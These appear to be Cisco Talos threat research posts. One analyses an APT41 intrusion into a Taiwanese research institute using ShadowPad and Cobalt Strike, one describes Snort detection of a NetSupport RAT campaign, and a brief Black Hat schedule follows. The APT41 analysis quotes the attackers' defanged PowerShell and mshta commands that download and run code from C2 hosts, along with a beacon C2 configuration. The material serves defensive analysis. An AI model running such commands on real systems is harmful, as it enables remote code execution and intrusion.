In August 2023, Cisco Talos detected abnormal PowerShell commands connecting to an IP address to download and execute PowerShell scripts in the environment of a Taiwanese government-affiliated research institute. The victim in this attack was a research institute in Taiwan, affiliated with the government, that specializes in computing and associated technologies. The nature of research and development work carried out by the entity makes it a valuable target for threat actors dedicated to obtaining proprietary and sensitive technologies of interest to them.

**Chinese Threat Actors likely Behind the Attacks**

Cisco Talos assesses with medium confidence that this campaign is carried out by APT41, alleged by the U.S. government to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics, techniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups. Talos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However, Talos has been unable to retrieve the final ShadowPad payloads used by the attackers.

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups. The malware was publicly reported being used by APT41, which is a hacking group believed to be based out of Chengdu, China, according to the U.S. Department of Justice.  Along with APT41 it has also been used by other Chinese hacking groups like Mustang Panda and the Tonto Team.

During the investigation, we observed a couple TTPs or IoC that were observed in previous reported campaigns, including the following:

*   **The same second stage loader binary**: A second stage loader, that acts as a successor to the initial side-loaded ShadowPad loader, discovered by Talos was also linked to ShadowPad  and previously associated with ShadowPad publicly. We have also observed identical loading mechanisms, infection chains and file names being utilized in the current attacks with reliable previous open-source reporting.  
*   **Infrastructure overlapping:** Beside the binary connection, we also found a C2 (103.56.114\[.\]69) that was reported by Symantec. Although the campaign reportedly ran in April 2022, which is more than one year before the campaign we discovered, there were a few similarities between the TTPs observed in the two campaigns. This includes using the same ShadowPad Bitdefender loader, using similar file names for the tool, using Filezilla for moving files between endpoints and using the WebPass tool for dumping credentials. 
*   **The employment of Bitdefender executable for sideloading:** The malicious actor leverages Bitdefender where it uses an eleven year old executable to sideload the DLL-based ShadowPad loader. This technique has been seen in a variety of reports which have been attributed to APT41. This technique has been reported in multiple reports (Reports: 1, 2, 3, 4).

**Chinese Speaking Threat Actor**

This attack saw the use of a unique Cobalt Strike loader, written in GoLang is meant to evade detection of Cobalt Strike by Windows Defender. This loader is based on an anti-AV loader named CS-Avoid-Killing hosted on GitHub and written in Simplified Chinese. The repository is promoted in multiple Chinese hacking forums and technical tutorial articles.

The Cobalt Strike loader also consists of file and directory path strings in Simplified Chinese, indicating that the threat actors that built/compiled the loader were well-versed in the language.

__The Github repository of Cobalt Strike loader.__

__Technical tutorial article on making anti-AV__ __Cobalt Strike backdoor____.__

**Tactic, Technique and Procedure Analysis**

In August 2023, Cisco Talos detected abnormal PowerShell commands connected to an IP address to download PowerShell script for execution in the environment of the target. We performed an investigation based on our telemetry and found the earliest infiltration trace from mid July, 2023. We currently lacked sufficient evidence to conclusively determine the initial attack vector. The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network. 

Upon accessing the network, attackers start to gain a foothold by executing malicious code and binaries on the machine. On the machine with the web server, a webshell is installed to enable the threat actor’s ability to perform discovery and execution. The threat actors also dropped malwares including ShadowPad and Cobalt Strike with three different approaches: the installed webshell, RDP access and the reverse shell.

_Webshell drop_

C:/www/un/imjp14k.dll

C:/www/un/service.exe

C:/www/un/imjp14k.dll.dat

_RDP drop_

C:/Users/\[hide\]/Desktop/log.dll

C:/Users/\[hide\]/Desktop/imjp14k.dll

C:/Users/\[hide\]/Desktop/service.exe

C:/Users/\[hide\]/Desktop/imjp14k.dll.dat

C:/Users/\[hide\]/Desktop/log.dll.dat

_Reverse shell drop_

C:/Users/Public/calc.exe

C:/Users/Public/service.exe

C:/Users/Public/imjp14k.dll

C:/Users/Public/imjp14k.dll.dat

C:/Users/Public/log.dll

C:/Users/Public/log.dll.dat

We noticed that a couple of the ShadowPad components were detected and quarantined by our solution when being dropped. The threat actor  later changed their tactic to  bypass the detection.The first attempt was running the following PowerShell commands to launch the PowerShell script for downloading additional scripts (PowerShell and HTA) to run backdoor in memory.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://103.56.114\[.\]69:8085/p.ps1');test123"

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://www.nss.com\[.\]tw/p.ps1');test123"

mshta https://www.nss.com\[.\]tw/1.hta

powershell -nop -w hidden 

\-encodedcommand “JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFM..."

However, the attempt was again detected and interrupted before the attackers could carry out further actions. Later on, the attackers used another two PowerShell commands to download Cobalt Strike malware from a compromised C2 server (www.nss.com\[.\]tw). The Cobalt Strike malware had been developed using an anti-AV loader to bypass AV detection and avoid the security product quarantine. The following command was used by the threat actor to download anti-AV malware and run the malware in the victim's host machine. A more detailed description about the Cobalt Strike loader can be found in the Malware and Malicious Tools Analysis. 

powershell (new\-object System.Net.WebClient).DownloadFile('https://www.nss.com\[.\]tw/calc.exe','C:/users/public/calc.exe');"

powershell (new\-object System.Net.WebClient).DownloadFile('https://www.nss.com\[.\]tw/calc.exe','C:/users/public/calc2.exe'); "

During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn, which we will detail in the sections below. 

The malicious actor is careful, in an attempt to avoid detection, during its activity executes “quser” which, when using RDP allows it to see who else is logged on the system. Hence the actor can stop its activity if any other use is on the system. Cisco Talos also noticed that once the backdoors are deployed the malicious actor will delete the webshell and guest account that allowed the initial access.

**Information gathering and exfiltration**

We observed the threat actor harvesting passwords from the compromised environment. The actor uses Mimikatz to harvest the hashes from the lsass process address space and WebBrowserPassView to get all credentials stored in the web browsers.

From the environment the actor executes several commands including using “net,” “whoami,” “quser,” “ipconfig,” “netstat,” and “dir” commands to obtain information on user accounts, directory structure, and network configurations from the compromised systems. In addition, we also observed query to the registry key to get the current state of software inventory collection on the system with the following command:

C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64

Beside running commands to discover the network, we also observed the ShadowPad sample perform lightweight network scanning to collect the hosts in the network. The malware tries to discover other machines in the same compromised network environment by connecting to the IPs under the same C class sequentially. The connections were all sent to port “53781”, with unknown reason. 

To exfiltrate a large number of files from multiple compromised machines, we observed threat actors using 7zip to compress and encrypt the files into an archive and later using backdoors to send the archive to the control and command server.

Although there is no new backdoor or hacking tools in this attack, we did find some interesting malware loaders. The threat actor leverages two major backdoors into their infection chains in this campaign, including both shadowPad and Cobalt Strike malware. Those two major backdoors were installed via webshell, reverse shell and RDP by the attacker themselves. In addition, two interesting hacking tools were also found, one is to get local privilege escalation and the other is to get web browser credentials. 

**ShadowPad Loader**

During our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both iterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to initiate the ShadowPad loader.

The initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had referred to it as 'ScatterBee'. Its technical structure and the names of its multiple components have remained consistent with earlier reports.

The more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft Office IME imecmnt.exe binary, which is over 13 years old. Upon execution, this loader examines the current module for a specific byte sequence at offset 0xE367. Successful verification of the checksum prompts the loader to seek out and decrypt the "Imjp14k.dll.dat" payload for injection into the system's memory.

The imjp14k loader checksum

Furthermore, we conducted a pivot analysis of this latest loader using VirusTotal and other malware cloud repositories. We identified two different loader types, yet both employed the same legitimate binary to launch the malware.

*   G:\\Bee\\Bee6.2(HD)\\Src\\Dll\_3F\_imjp14k\\Release\\Dll\_3F\_imjp14k.pdb
*   G:\\Bee\\Tree\\Src\\Dll\_3F\_imjp14k\\Release\\Dll.pdb

Second type of imjp14k loader checksum

**Cobalt Strike “Anti-AV loader” from Chinese Open Source Project**

There is a Cobalt Strike loader also detected in this incident. With deep analysis for this loader, we found the loader not only packed with UPX but modified the section name to anti-unpack the malware. There are some interesting observations here suggesting that the adversary may be speaking Chinese. The loader was developed by Go programming language and string in the binary indicates a project name “go版本” which means “go version” in mandarin. Based on the project name we found that the code was cloned from a GitHub source that was written in simplified Chinese and the project is to avoid the Cobalt Strike being deleted by antivirus products.

Embedded project name

Upon analyzing the malware and GitHub page we found, we discovered that the attacker might have followed the GitHub steps to generate this loader and deploy the Cobalt Strike beacon to the victim's environment, the screenshots are shown this loader will get an encrypted picture from C2 server and the code logical same as the one on GitHub. 

Source code from github

Malware from the attack

It’s important to highlight that this cobalt strike beacon shellcode used steganography to hide in a picture and executed by this loader. In other words, its download, decryption, and execution routines all happen in runtime in memory. This Cobalt Strike beacon configuration shown below. 

{"C2Server": "http://45.85.76.18:443/yPc1", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\\r\\n"}

Unmarshal.exe malware decrypts its payload with four stages. The first stage is the executable file which will try to search \[filename\].tbin, and inject a first stage decryption payload, inject\_loader\_1.dll, in an allocated memory block. The first stage decryption payload will decompress second stage payload, inject\_loader\_2.dll, and injection into memory, the second stage payload will also try to search \*.dlls or ddb.dlls file for next stage payload. If it can not find the specific file, it will decrypt the final payload out and inject that payload into another memory block. After deep analysis, we found the final payload is UnmarshalPwn malware which is a POC for CVE-2018-0824 and uses a remote code execution vulnerability to get local privilege escalation. 

With the artifacts we found in this campaign, we pivoted and discovered some samples and infrastructure that were likely used by the same threat actors but in different campaigns. Although we don’t have further visibility into more details about these campaigns at the moment, we hope that by revealing this information, it would empower the community to connect the dots and leverage these insights for additional investigations.

We found 2 other ShadowPad loaders by pivoting the RICH PE header (978ece20137baea2bcb364b160eb9678) of the ShadowPad loader. Sharing the same RICH PE header indicates that these binaries share a similar compilation environment.

*   2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
*   eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28

One of the loaders were observed downloaded from two C2 servers:

*   103.96.131\[.\]84
*   58.64.204\[.\]145

Beside the ShadowPad loader, we found the same Bitdefender loader (386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd) and a payload file on the C2 server. The ShadowPad payload connects to an interesting C2 domain w2.chatgptsfit\[.\]com for communication.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

ClamAV detections are also available for this threat:

Win.Packed.UnmarshalPwn-10019484-0

Win.Packed.CobaltStrike-10019485-0

Win.Loader.UnmarshalPwn-10019486-0

Win.Loader.Shadowpad-10019487-0 

**IOCs **

IOCs for this research can also be found at our GitHub repository here.

APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

In this first Deep Dive with NTDR, we explore how defenders can leverage Snort for the detection of evasive malware threats.

Thursday, August 1, 2024 06:00

_By Chris Morrison._

*   Cisco Talos is actively tracking multiple malware campaigns that utilize NetSupport RAT for persistent infections. 
*   These campaigns evade detection through obfuscation and updates. 
*   Snort can provide a strong defense before this malware reaches endpoints. 
*   In this first Deep Dive with NTDR, we explore how defenders can leverage Snort for the detection of evasive malware threats. 

In November 2023, security vendors identified a new NetSupport RAT campaign that used fake browser updates from compromised and malicious websites to trick users into downloading a stager that downloads and invokes PowerShell commands to install the NetSupport manager agent onto the victim’s machine and establish persistence. 

In January 2024, security researchers published another analysis of the same campaign, although with some differences in the initial JavaScript payload, which demonstrates a threat actor re-focusing on the obfuscation of the initial stager. There are also modifications observed in the agent installation including new paths for the randomized installation. 

So, Cisco Talos followed suit with our own in-depth analysis. We identified multiple obfuscation and evasion techniques being used by the campaign and created appropriate detection to keep users protected. By identifying specific weaknesses in the campaign’s obfuscation techniques and identifying indicators of compromise (IOCs), we can create highly accurate detection of this campaign. Talos is also in a unique position of having primarily open-source detection tools such as Snort and ClamAV. To highlight these capabilities, we will provide a detailed explanation of our detection methodology. 

**Campaign history **

NetSupport Manager has been commercially available for remote device administration since 1989. Like many tools in the IT remote support industry, NetSupport Manager has been weaponized by threat actors who either cannot or do not wish to develop their own RAT. Adversaries first started using NetSuport for malicious purposes in 2017, and at this point, most security vendors widely recognize this software as a RAT. The 2020s' shift to remote work for many office workers marked an increased use of NetSupport RAT in more phishing and drive-by download campaigns, as well as being used alongside other loaders. This campaign is the most notable use of NetSupport RAT in recent years, with hundreds of known stager variants across dozens of domains used in a large-scale malicious advertising campaign. 

**Component summary **

Components in VirusTotal graph. 

1.  Stage 1 is a JavaScript file that is downloaded from one of several malicious advertisements or compromised websites. It’s an obfuscated downloader, keeping a Stage 2 JavaScript and PowerShell payload in memory, which is the actual meat of the dropper. Stage 1 is obfuscated and embedded within otherwise benign JavaScript libraries. 
2.  In Stage 2, a PowerShell script is run via JavaScript. Both are obfuscated, and the PowerShell is embedded in the JavaScript, and the JavaScript is embedded within large comment blocks of random ASCII hex. The PowerShell makes another HTTP GET to retrieve the base64-encoded ZIP. On receipt, the PowerShell extracts the payload into a semi-random path, starts execution, and then establishes basic registry persistence. 
3.  The end payload is a completely portable install of the commercial NetSupport Manager RAT utility. Some of the installs come with additional scripts or slight filename changes to avoid more narrow detection. 

**Stage 1: JavaScript stager **

From 3b587d0c311e8ebc3bb104d564235c41ef8e64592c7419f17f48e0cee9ebc878. 

The screenshot above shows the normalized inner payload for an older version of the JavaScript Stage 1. In this older sample, the actual malicious code is embedded within an otherwise benign JavaScript library. Several libraries are used, including jQuery, moment.js and SheetJS. However, this stage's actual malicious payload is barely obfuscated. The next stage download URL is in plain text. The call to “activeXObject” to create the HTTP connection is in plain text. And similarly, the eval call is in plain text. 

From 01d867d552a06bd778c812810a476441681c4bebabf967e80f8024b3856cb03e 

Here, we have the normalized content of a very recent (first seen 2024.03.09) sample of the stager from the same campaign. Similarly to the older version, the malicious payload is wrapped in an otherwise benign library. Improving over the previous versions, the malicious payload within is further obfuscated with the open-source tool javascript-obfuscator. This results in the removal of the plaintext “activeXObject” and “eval,” however, the output pattern of JavaScript-obfuscator is highly identifiable, as every variable and function name is a random hexadecimal value prefixed by an underscore. 

Deobfuscated 01d867d552a06bd778c812810a476441681c4bebabf967e80f8024b3856cb03e 

The old and new samples shared two major features: All the obfuscation is pre-computed and not done on a per-download basis. This is observable through the fact that so many of the stages can be identified with common entry point functions after having been obfuscated with javascript-obfuscator. Also, the pre-obfuscated stagers are reused by stamping them with a new random download URL. This URL then ends up being in plain text as well so from identifying the highly unique function names from one stager, we can find many more and then automatically extract the download URLs from them statically, which is much faster than throwing them all in analysis sandboxes.  

Fast pattern-only rule for detection. 

**Stage 1 detection **

From a detection standpoint, we can use Snort to leverage a fast\_pattern-only file rule. This simple rule will only detect the given cluster of stagers being downloaded. However, since this is a fast\_pattern-only rule on highly unique text, we can put it in the more general Snort policy configurations since there is little overhead to running this rule. Additionally, the Snort 3 file rule will do all the abstraction from other protocols that can carry files, such as FTP and SMTP, letting us cast our coverage net over a broader attack surface in case this file is being transmitted through more ways than just the known malicious advertisement. 

**Stage 2: JavaScript & PowerShell dropper **

The second stage of the campaign is an in-memory payload downloaded by the on-disk JavaScript. This stage consists of a JavaScript function that then calls PowerShell. 

From 6f3681cd91f7a19c1cf2699e1f9f7b550dfe46841ab5171124e79979fae5424a 

 The JavaScript content is padded on either side by large, repeating, random comment blocks. The actual JavaScript is quite simple, a slightly obfuscated call to ActiveXObject(“WScript.Shell”), which allows the PowerShell command-line to be run. 

Deobfuscated from 6f3681cd91f7a19c1cf2699e1f9f7b550dfe46841ab5171124e79979fae5424a 

The PowerShell invocation is where most of the dropper’s work happens. PowerShell is run with the command line flags “-Ex Bypass” which sets the execution policy to “Bypass”, enabling unsigned execution, “-NoP” which is short for “-NoPolicy” and avoids the current user’s startup script, and “-C” which is short for “-command” and will run the following command line string as a PowerShell script. The commands themselves are a straightforward download of the next stage, which is a base64-encoded ZIP file that contains a portable installation of NetSupport Manager Agent. After downloading the payload, it is base64-decoded, written to disk, and then extracted to the target install folder. A check is run to make sure “client32.exe,” the main executable of the agent, exists in the output directory and then this file is run. Finally, a registry entry is made to establish user-level persistence of the agent on login. 

Interestingly, this stage is not obfuscated with the same techniques as the Stage 1 file. The PowerShell file is only slightly obfuscated through random variable names and string concatenations, and the JavaScript obfuscation uses the same techniques in addition to the mentioned large random comment blocks. Because this obfuscation is so limited, we can rely on static signatures in this case. If future versions of this stager are further obfuscated, using normalized content buffers in Snort such as js\_data can provide a consistent view into the payload. However, this payload has remained largely unchanged besides the payload URLs from November 2023 to March 2024. 

**Stage 2 detection **

For Snort detection, we can use a simple series of content that matches the content of the PowerShell script. The unobfuscated registry key for persistence combined with the PowerShell flags makes a great rule for potential malware dropper detection. We can narrow this even further with the inclusion of the client32.exe filename so that we know we are only alerting on this campaign and similar uses of NetSupport RAT. 

An additional trick would be the use of an HTTP service rule. In Snort 3, the service inspector can identify known services regardless of the port they are on, in contrast to Snort 2 where you will need to define HTTP\_PORTS ahead of time. Regardless of what port the attacker is hosting the HTTP payload on, our rule can detect the malicious content. 

This Snort rule identifies and prevents the current iteration of dropper payloads. A more holistic approach to defense would also include behavioral detection. Since we can observe this dropper’s behavior regardless of any text obfuscation, we will effectively forbid this technique on any protected endpoint and force the threat actor to change tactics. 

Example Sigma detection. 

 The Sigma behavioral rule language can encapsulate this detection quite well. This rule can detect most installs but will fail to identify obfuscations through renames or different registry keys. 

**Obfuscated NetSupport manager download **

Retreading a little bit, the PowerShell invocation downloads a base64-encoded ZIP file of an entire installation of NetSupport Manager agent. For NetSupport Manager and most other legitimate software packages, this is a highly unusual way for the package to be distributed. Most applications are installed via an MSI package or an EXE installer that downloads the full application without obfuscation. The client binaries are not obfuscated by the threat actor since obfuscating an existing compiled binary is more challenging than obfuscating the source code scripts identified in stage 1 and stage 2 files. Because of this, the unique DLLs that encompass most of the NetSupport Manager Client’s actual logic are not renamed. 

It might seem we will have to stream decode the base64 content and unzip it in memory to scan for malicious file contents; we can exploit two specific features of the ZIP in base64 format. The highly unique DLL names will all be close together in the ZIP archive central directory, the structure that holds the information on what files are in the archive. Second, base64 is not a random encoding, and we can pre-compute all three possible base64-encoded strings that represent any one given input. CyberChef has an excellent demonstration of how this works. This method involves the possible two-bit alignment positions within the six-bit encoding size of a given base64 character. Putting all this together means that we can pre-compute all the combinations of the base64-encoded DLL names as high-speed rules that are only looking for static content matches.  

The threat actors using NetSupport RAT in this campaign are typically looking for the fastest way to get a RAT agent into deployment. The threat actors who use NetSupport Manager are not putting a strong amount of effort into obfuscation of droppers, let alone the agents, so this is an effective rule for their non-standard download paths.  

**Additional Snort detections **

Talos has existing Snort coverage for NetSupport Manager Agent’s network activity leveraging SID 44678, which was created back in 2017. We also expanded this coverage in 2020, with the creation of SIDs 53539 - 53544 as the usage by malicious actors increased. For the latest campaign, we increased our coverage through a Snort feature that was not available before. File Rules are a feature only available in Snort 3 that allows the abstraction of file contents from the protocols that carry them, allowing us to write wider-reaching signatures. 

As the NetSupport RAT files are not typically obfuscated by threat actors and it is a legitimate commercial product with many specialized features, there are many opportunities to create detection against the files. For example, in both the EXE and DLLs, the full manufacturer and product information for NetSupport Manager Client is detailed. 

As other legitimate software binaries are unlikely to include the full metadata for NetSupport Manager, this gives us a great signature to work with that lets us cleanly identify the binaries without any heavy reverse engineering needed. Although Snort does not have a modifier for Unicode strings, Unicode text byte strings can be leveraged for detection. Once again, we can use the “file” rule target to throw our detection net over a much larger surface than just HTTP downloads. Other campaigns using NetSupport Manager RAT will be observable from this rule through Snort’s ability to inspect file streams from multiple protocols. 

Although NetSupport RAT continues to be used by malicious campaigns, its widespread use hinders those threat actors who are not willing to dedicate the resources to develop their own tools or more evasive techniques. And since this campaign is still active and updated, we may still observe these techniques being developed and deployed by this threat actor. For now, this gives us an example of when a threat is persistent but not advanced. 

**Indicators of Compromise **

Indicators of Compromise associated with this threat can be found here.

Detecting evolving threats: NetSupport RAT campaign

This year marks the 10th anniversary of Cisco Talos, as the Talos brand was officially launched in August 2014 at Black Hat.

Thursday, August 1, 2024 05:00

With Black Hat just a week away, Cisco Talos is gearing up for another year of heading to Las Vegas to share in some of the latest major cybersecurity announcements, research and news.  

This year marks the 10th anniversary of Cisco Talos, as the Talos brand was officially launched in August 2014 at Black Hat.

We’re celebrating 10 years of pissing off the bad guys by highlighting Talos moments from the archives and recognizing the folks that make Talos, Talos. Be sure to swing by the Cisco booth in the business hall to celebrate 10 years with us!

We know the week of Black Hat is a busy one, so we’ve pulled together our highlights, so you don’t miss anything:  

**Wednesday, Aug. 7  **

**On the show floor:** Talos will have a demo within the Cisco booth where members of Talos will be available all day long. Talos folks will also be presenting in-booth talks every half hour on their latest research and findings. You can also catch a Talos overview in the Splunk booth. 

**Lunch & Learn:** Engage with Cisco Talos Incident Response over "Backdoors & Breaches." Join Joe Marshall and other Talosian game masters from 12:05 to 1:30 p.m. local time in Lagoon KL, Level 2 as they walk attendees through incident response tabletop exercises and learn attack tactics, tools and methods.  

**Sponsored Session:** Nick Biasini will be giving a Cisco Talos threat briefing on identity attacks, zero-days, ransomware and infostealers. Join the session in Mandalay Bay I from 3 - 3:50 p.m. local time.   

**Thursday, Aug. 8 **

**On the show floor:** Talos will have a demo within the Cisco booth where members of Talos will be available all day long. Talos folks will also be presenting in-booth talks every half hour on their latest research and findings. In the Splunk booth, Brad Garnett will cover how Talos IR integrates with Splunk.

Tag

#cisco